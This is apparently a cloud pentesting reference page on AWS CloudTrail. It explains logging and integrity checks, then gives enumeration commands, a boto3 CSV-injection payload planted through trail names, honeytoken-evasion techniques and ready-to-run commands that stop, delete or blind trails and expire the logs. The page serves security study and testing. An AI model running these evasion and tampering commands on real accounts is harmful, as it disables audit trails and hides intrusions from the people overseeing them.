AWS - CloudTrail Enum


CloudTrail

AWS CloudTrail records and monitors activity within your AWS environment. It captures detailed event logs, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.

Each logged event contains:

  • The name of the called API: eventName

  • The called service: eventSource

  • The time: eventTime

  • The IP address: sourceIPAddress

  • The agent through which the request was made: userAgent. Examples:

    • signin.amazonaws.com - From the AWS Management Console

    • console.amazonaws.com - Root user of the account

    • lambda.amazonaws.com - AWS Lambda

  • The request parameters: requestParameters

  • The response elements: responseElements
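
The fields above can be pulled out of a recorded event via the CLI. A minimal sketch, assuming jq is installed and the credentials can call cloudtrail:LookupEvents:

# Grab the latest recorded event and extract the fields described above
aws cloudtrail lookup-events --max-results 1 \
    --query 'Events[0].CloudTrailEvent' --output text \
    | jq '{eventName, eventSource, eventTime, sourceIPAddress, userAgent, requestParameters, responseElements}'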

Events are written to a new log file approximately every 5 minutes in JSON format; they are held by CloudTrail and finally delivered to S3 approximately 15 minutes later. CloudTrail logs can be aggregated across accounts and across regions. CloudTrail also offers log file integrity validation so you can verify that your log files have remained unchanged since CloudTrail delivered them: it creates a SHA-256 hash of the logs inside a digest file, and a new digest covering the new logs is created every hour. When creating a Trail, the event selectors allow you to indicate which events the trail should log: management, data or Insights events.

Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3), so AWS will decrypt the content for anyone who has access to it, but for additional security you can use SSE with KMS and your own keys.

The logs are stored in a S3 bucket with this name format:

  • BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD

  • Where the BucketName typically has the format: aws-cloudtrail-logs-<accountid>-<random>

  • Example: aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/

Log File Naming Convention

Inside each folder, each log file will have a name following this format: AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz

Moreover, digest files (used to verify log file integrity) are delivered to the same bucket under their own prefix.
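
If you can read the logging bucket, the delivered log files can be listed and fetched directly. A minimal sketch (bucket name, account ID, region, date and file name are placeholders):

# List the log files delivered for a given day
aws s3 ls s3://aws-cloudtrail-logs-<accountid>-<random>/AWSLogs/<accountid>/CloudTrail/<region>/2023/02/22/

# Download and decompress one of them to inspect the JSON events
aws s3 cp s3://aws-cloudtrail-logs-<accountid>-<random>/AWSLogs/<accountid>/CloudTrail/<region>/2023/02/22/<log-file>.json.gz .
gunzip <log-file>.json.gz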

Aggregate Logs from Multiple Accounts

  • Create a Trail in the AWS account where you want the log files to be delivered to

  • Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access (a sketch of such a bucket policy is shown after this list)

  • Create a new Trail in the other AWS accounts and select to use the bucket created in step 1
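
A minimal sketch of the bucket policy from step 2, assuming the destination bucket is called my-cloudtrail-bucket and the member accounts are 111111111111 and 222222222222 (all placeholders):

aws s3api put-bucket-policy --bucket my-cloudtrail-bucket --policy '{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AWSCloudTrailAclCheck",
      "Effect": "Allow",
      "Principal": {"Service": "cloudtrail.amazonaws.com"},
      "Action": "s3:GetBucketAcl",
      "Resource": "arn:aws:s3:::my-cloudtrail-bucket"
    },
    {
      "Sid": "AWSCloudTrailWrite",
      "Effect": "Allow",
      "Principal": {"Service": "cloudtrail.amazonaws.com"},
      "Action": "s3:PutObject",
      "Resource": [
        "arn:aws:s3:::my-cloudtrail-bucket/AWSLogs/111111111111/*",
        "arn:aws:s3:::my-cloudtrail-bucket/AWSLogs/222222222222/*"
      ],
      "Condition": {"StringEquals": {"s3:x-amz-acl": "bucket-owner-full-control"}}
    }
  ]
}'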

However, even if you can save all the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs log group belonging to a single AWS account.

Remember that an account can have several CloudTrail Trails enabled, storing the same (or different) logs in different buckets.

Cloudtrail from all org accounts into 1

When creating a CloudTrail Trail, it's possible to activate CloudTrail for all the accounts in the org and send the logs to just 1 bucket.

This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).
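
A minimal sketch of creating such an organization trail from the management account (the trail and bucket names are placeholders):

# Create a multi-region trail that records events from every account in the organization
aws cloudtrail create-trail \
    --name org-trail \
    --s3-bucket-name <central-logs-bucket> \
    --is-organization-trail \
    --is-multi-region-trail

# Start recording
aws cloudtrail start-logging --name org-trail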

Log Files Checking

You can check that the logs haven't been altered by running

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

Logs to CloudWatch

CloudTrail can automatically send logs to CloudWatch so you can set alerts that warn you when suspicious activities are performed. Note that in order to allow CloudTrail to send the logs to CloudWatch, a role needs to be created that allows that action. If possible, it's recommended to use the AWS default role to perform these actions. This role will allow CloudTrail to:

  • CreateLogStream: This allows it to create CloudWatch Logs log streams

  • PutLogEvents: This allows it to deliver CloudTrail logs to the CloudWatch Logs log stream
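
A minimal sketch of wiring an existing trail to a CloudWatch Logs log group (the trail, log group and role names are placeholders):

# Attach the log group and the role CloudTrail will assume to deliver events
aws cloudtrail update-trail \
    --name <trail_name> \
    --cloud-watch-logs-log-group-arn arn:aws:logs:<region>:<account-id>:log-group:<log-group-name>:* \
    --cloud-watch-logs-role-arn arn:aws:iam::<account-id>:role/<cloudtrail-to-cloudwatch-role>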

Event History

CloudTrail Event History allows you to inspect in a table the events that have been recorded during the last 90 days.
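
The same history can also be queried from the CLI; for example, filtering by an event name (the attribute value is just an illustration):

# Query the event history without needing access to the S3 bucket
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin --max-results 10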

Insights

CloudTrail Insights automatically analyzes write management events from CloudTrail trails and alerts you to unusual activity. For example, if there is an increase in TerminateInstances events that differs from established baselines, you’ll see it as an Insights event. These events make finding and responding to unusual API activity easier than ever.

The insights are stored in the same bucket as the CloudTrail logs in: BucketName/AWSLogs/AccountID/CloudTrail-Insight
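
A minimal sketch of enabling Insights on an existing trail (the trail name is a placeholder):

# Enable Insights for unusual API call rates and API error rates
aws cloudtrail put-insight-selectors --trail-name <trail_name> --insight-selectors '[{"InsightType": "ApiCallRateInsight"}, {"InsightType": "ApiErrorRateInsight"}]'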

Security

Access Advisor

AWS Access Advisor relies on the last 400 days of AWS CloudTrail logs to gather its insights. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to show when services were last accessed. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about refining permissions, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.

Therefore, Access Advisor reports the unnecessary permissions given to users so the admin can remove them.
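
The same last-accessed data can be pulled from the CLI. A minimal sketch (the ARN and job id are placeholders):

# Start a job that gathers service last accessed details for a user, role, group or policy
aws iam generate-service-last-accessed-details --arn arn:aws:iam::<account-id>:user/<username>

# Fetch the results using the JobId returned by the previous command
aws iam get-service-last-accessed-details --job-id <job-id>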

Actions

Enumeration

# Get trails info
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]

# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>

# Get data store info
aws cloudtrail list-event-data-stores
aws cloudtrail list-queries --event-data-store <data-source>
aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>

CSV Injection

It's possible to perform a CSV injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and opened with Excel. The following code will generate a log entry with a bad Trail name containing the payload:

import boto3

# Excel formula that will execute calc.exe when the exported CSV is opened
payload = "=cmd|'/C calc'|''"

client = boto3.client('cloudtrail')
# The call fails because of the invalid trail name, but the malicious name still ends up in the CloudTrail logs
response = client.create_trail(
    Name=payload,
    S3BucketName="random"
)
print(response)

For more information about CSV Injections check the page:

For more information about this specific technique check https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/

Bypass Detection

HoneyTokens bypass

Honeytokens are created to detect exfiltration of sensitive information. In the case of AWS, they are AWS keys whose use is monitored; if something triggers an action with that key, then someone must have stolen that key.

However, this monitoring is performed via CloudTrail, and there are some AWS services that don't send logs to CloudTrail (find the list here). Some of those services will respond with an error containing the ARN of the key's role if someone unauthorised (using the honeytoken key) tries to access them.

This way, an attacker can obtain the ARN of the key without triggering any log. In the ARN the attacker can see the AWS account ID and the name; since it's easy to know the account IDs and names used by HoneyToken companies, an attacker can identify if the token is a HoneyToken.

HoneyTokens Detection

Pacu detects if a key belongs to Canarytokens, SpaceCrab, SpaceSiren:

  • If canarytokens.org appears in the role name or the account ID 534261010715 appears in the error message.

    • Testing them more recently, they are using the account 717712589309 and still have the canarytokens.com string in the name.

  • If SpaceCrab appears in the role name in the error message

  • SpaceSiren uses uuids to generate usernames: [a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}

  • If the name looks randomly generated, there is a high probability that it's a HoneyToken.

Note that all public APIs that were discovered not to create CloudTrail logs have now been fixed, so you may need to find your own...

Or you can get the Account ID encoded inside the access key as explained here and check the account ID against your list of HoneyToken AWS accounts:

import base64
import binascii

def AWSAccount_from_AWSKeyID(AWSKeyID):
    # Remove the 4-character prefix (e.g. AKIA/ASIA) and base32-decode the rest
    trimmed_AWSKeyID = AWSKeyID[4:]
    x = base64.b32decode(trimmed_AWSKeyID)
    # The account ID is packed into the first 6 bytes
    y = x[0:6]

    z = int.from_bytes(y, byteorder='big', signed=False)
    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)

    # Mask out the irrelevant bits and shift to recover the 12-digit account ID
    e = (z & mask) >> 7
    return e

print("account id: " + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))

For more information check the original research.

Accessing Third Infrastructure

Certain AWS services will spawn some infrastructure such as Databases or Kubernetes clusters (EKS). A user talking directly to those services (like the Kubernetes API) won’t use the AWS API, so CloudTrail won’t be able to see this communication.

Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and talk to the API server directly without being detected by CloudTrail.
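
A minimal sketch of this, assuming you know the cluster name, have discovered its API endpoint and your principal is mapped in the cluster's RBAC (all of these are placeholders/assumptions):

# get-token builds a presigned STS token locally; the traffic to the Kubernetes API itself never touches the AWS API
TOKEN=$(aws eks get-token --cluster-name <cluster-name> --query 'status.token' --output text)

# Talk to the Kubernetes API server directly with that token
curl -k -H "Authorization: Bearer $TOKEN" https://<discovered-eks-api-endpoint>/api/v1/namespaces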

More info in:

Modifying CloudTrail Config

Delete trails

aws cloudtrail delete-trail --name [trail-name]

Stop trails

aws cloudtrail stop-logging --name [trail-name]

Disable multi-region logging

aws cloudtrail update-trail --name [trail-name] --no-is-multi-region-trail --no-include-global-service-events

Disable Logging by Event Selectors

# Leave only the ReadOnly selector
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>

# Remove all selectors (stop Insights)
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>

In the first example, a single event selector is provided as a JSON array with a single object. The "ReadWriteType": "ReadOnly" indicates that the event selector should only capture read-only events (so CloudTrail insights won't be checking write events for example).

You can customize the event selector based on your specific requirements.

Logs deletion via S3 lifecycle policy

aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>

Modifying Bucket Configuration

  • Delete the S3 bucket

  • Change the bucket policy to deny any writes from the CloudTrail service (a sketch of such a policy is shown after this list)

  • Add a lifecycle policy to the S3 bucket to delete objects

  • Disable the KMS key used to encrypt the CloudTrail logs
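
A minimal sketch of the deny-writes option, assuming the logging bucket is called my-cloudtrail-bucket (a placeholder):

aws s3api put-bucket-policy --bucket my-cloudtrail-bucket --policy '{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyCloudTrailWrites",
      "Effect": "Deny",
      "Principal": {"Service": "cloudtrail.amazonaws.com"},
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::my-cloudtrail-bucket/*"
    }
  ]
}'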

Cloudtrail ransomware

S3 ransomware

You could generate an asymmetric key, make CloudTrail encrypt the data with that key, and then delete the private key so the CloudTrail contents cannot be recovered. This is basically S3-KMS ransomware, explained in:

KMS ransomware

This is an easier way to perform the previous attack with different permission requirements:

